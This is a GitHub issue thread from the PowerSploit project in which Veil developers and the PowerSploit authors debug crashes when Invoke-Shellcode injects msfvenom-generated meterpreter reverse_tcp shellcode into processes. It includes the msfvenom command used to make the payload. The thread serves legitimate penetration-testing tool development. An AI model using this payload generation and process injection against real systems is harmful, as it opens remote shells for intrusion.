Invoke-Shellcode working with updated msf?

[ChrisTruncer]

Hey there,

First off, big fan of a lot of your scripts on here. Really useful stuff. Myself and two other guys work on Veil, and we ran into an issue with powershell injection, and I think it may apply here too. I could be doing it wrong, but figured I'd at least ask and see your thoughts.

It looks like a recent update to MSF may have caused some problems with injection shellcode via powershell, either into itself, or another process. We tested powershell injection with an old version of MSF, and it worked, and then testing with the latest version, crashes for us. We originally thought that it may be a problem on our end, so to test that, I grabbed your Invoke-Shellcode script, formatted the msf shellcode properly for your script, and then tried injecting the shellcode into powershell, and then also into a notepad process I had running, using Invoke-Shellcode. Both attempts resulted in a crash of the process.

So, long story short, I COULD be doing it wrong, but never seemed to have an issue before when using Invoke-Shellcode, but it seems to crash now. I was curious if you were also able to re-create the crash. If you need more info from me, let me know in here, but I didn't do anything special besides giving it -Shellcode and then the shellcode (formatted as per your example in the script).

[obscuresec]

Chris,

Do you mind checking the architecture of the shellcode and the architecture of the process you are injecting into? Also, what is the OS so I can try and recreate the problem.

Do you know more about the update that they made?

Chris C.

On Thu, Mar 6, 2014 at 2:48 PM, ChrisTruncer notifications@github.comwrote:

Hey there,

First off, big fan of a lot of your scripts on here. Really useful stuff. Myself and two other guys work on Veil, and we ran into an issue with powershell injection, and I think it may apply here too. I could be doing it wrong, but figured I'd at least ask and see your thoughts.

It looks like a recent update to MSF may have caused some problems with injection shellcode via powershell, either into itself, or another process. We tested powershell injection with an old version of MSF, and it worked, and then testing with the latest version, crashes for us. We originally thought that it may be a problem on our end, so to test that, I grabbed your Invoke-Shellcode script, formatted the msf shellcode properly for your script, and then tried injecting the shellcode into powershell, and then also into a notepad process I had running, using Invoke-Shellcode. Both attempts resulted in a crash of the process.

So, long story short, I COULD be doing it wrong, but never seemed to have an issue before when using Invoke-Shellcode, but it seems to crash now. I was curious if you were also able to re-create the crash. If you need more info from me, let me know in here, but I didn't do anything special besides giving it -Shellcode and then the shellcode (formatted as per your example in the script).

Reply to this email directly or view it on GitHubhttps://github.com/mattifestation/PowerSploit/issues/39 .

[ChrisTruncer]

I don't know about the update, I'm trying to look back and see what it is. It's odd, all other formats of injection that we play around with works fine, it seems only isolated to powershell.

I just used Invoke-Shellcode on x86 Filezilla process, generated x86 windows/meterpreter/reverse_tcp shellcode with msfvenom. I loaded up Invoke-Shellcode on Win 8.1 (which is x64), and told it to inject into the filezilla process. That caused a crash of it.

If there is a different OS, or something else I can help create an environment that's easy for you to test on, then let me know. Will (harmj0y) and I have been trying to look at this and figure out what it could be for a little bit now.

[ChrisTruncer]

Also, Will has been testing on a Win 7 VM (x64) and had the same issue. Again, it only happens when he updated MSF. When he uses MSF version 4.8.2 it works, but when updating to the latest, it crashes.

[mattifestation]

Hey Chris. Thanks for the kind words. :)

Could you provide the exact command you used to generate the offending payload? Honestly, I haven't used msf in years so I'm certainly not abreast to any recent changes. If I can replicate the crash though, I should be able to figure out the issue in no time. Can you also answer the following questions for me?

1) Was your exit method "thread"? What I'm mainly curious about is whether or not the last instruction executed in the payload is a RET. This is important because the shellcode stub in Invoke-Shellcode transfers control to the primary shellcode payload via a CALL. 2) Does the payload crash immediately upon execution or upon completion of the payload? I suspect the crash will occur after execution of the payload. 3) Were you injecting into another process with Invoke-Shellcode or did you only provide the -Shellcode switch? 4) What was the architecture of your shellcode and the PowerShell process you ran Invoke-Shellcode in?

Thanks! If it's easier for you, you can just send me the shellcode byte array that was causing the crash and I can give you a quick answer as to what the issue might be.

Cheers, Matt

[ChrisTruncer]

Hey Matt,

I absolutely couldn't say enough good stuff about Powersploit. It's really advanced and I think it's great work.

For the shellcode generation, I/we are invoking msfvenom. We're running basically the following command:

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f c | sed '1,6d;s/[";]//g;s/\/,0/g' | tr -d '\n' | cut -c2-

To get it into the format you guys use, you can add on the piping I added above. Honestly, I haven't tested custom generated shellcode. For a lot of the stuff we do, we can use MSF, so we just use their shellcode generation capabilities. It'll show a couple messages at the top when using that command, but it'll default to x86 arch for a windows platform. To test, I've started an x86 process on both win 7 and win 8.1. When injecting into the process on both platforms, it crashes the process on the latest version of MSF, but as of a previous version (metasploit v4.8.2-2014021201 [core:4.8 api:1.0] ), it worked for Will (harmj0y). As of metasploit v4.8.2-2014021901 [core:4.8 api:1.0](which is what I have installed), the crashes happen. So we've essentially isolated it from that update to be working, to current version, crashes are happening.

As for your questions:

1. We've been using the exitfunc == process. We can try testing thread, no problem, but I can also state that process did used to work.
2. The crash looks to be immediately upon execution of the shellcode. No callback is ever received.
3. I tried both injecting into powershell (but that was a x64 process having x86 shellcode injected into it), and also loaded up a couple of x86 processes (filezilla, and something else), tried injecting into those as well, and it crashed.
4. Both my win 7, and win 8.1 are x64 bit. Same with Will's machines. The odd thing about this is that this setup used to work.

Anyways, not trying to cause a ton of work or man hours. If it's a ton of work, I don't want to bother you all about it. I was just curious that it was impacting us, and that it seemed to also impact the Invoke-Shellcode script, and figured I'd let you know (and would love to know if I'm messing it up somehow).

Anyways, thanks, and I'm interested if you guys see the same issues.

[mattifestation]

Hey Chris,

I generated a bunch of payloads and couldn't replicate the issue you were running into until I started playing around with your sed command. The '1,6d' portion of the sed command was truncating a portion of the shellcode. Instead of messing with sed, try '-f powershell' with msfvenom.

[ChrisTruncer]

Hey Matt,

You're absolutely right. Once I just used -f powershell that fixed it. Also, that lead me to look into msfvenom specifically, and I figured out the issue. The new MSF update changed some of the output of msfvenom, only slightly, but enough to cause stuff to crash for us, as we were including messages, along with the shellcode, and that obviously caused powershell to crash. And my sed fail, ha, caused this to crash.

So I can confirm there isn't an issue at all, it was all a good old layer 8 error. Sorry for having you guys look into something where there wasn't an issue, and really appreciate you all taking the time to do so.

Thanks a lot, I'm closing the issue out.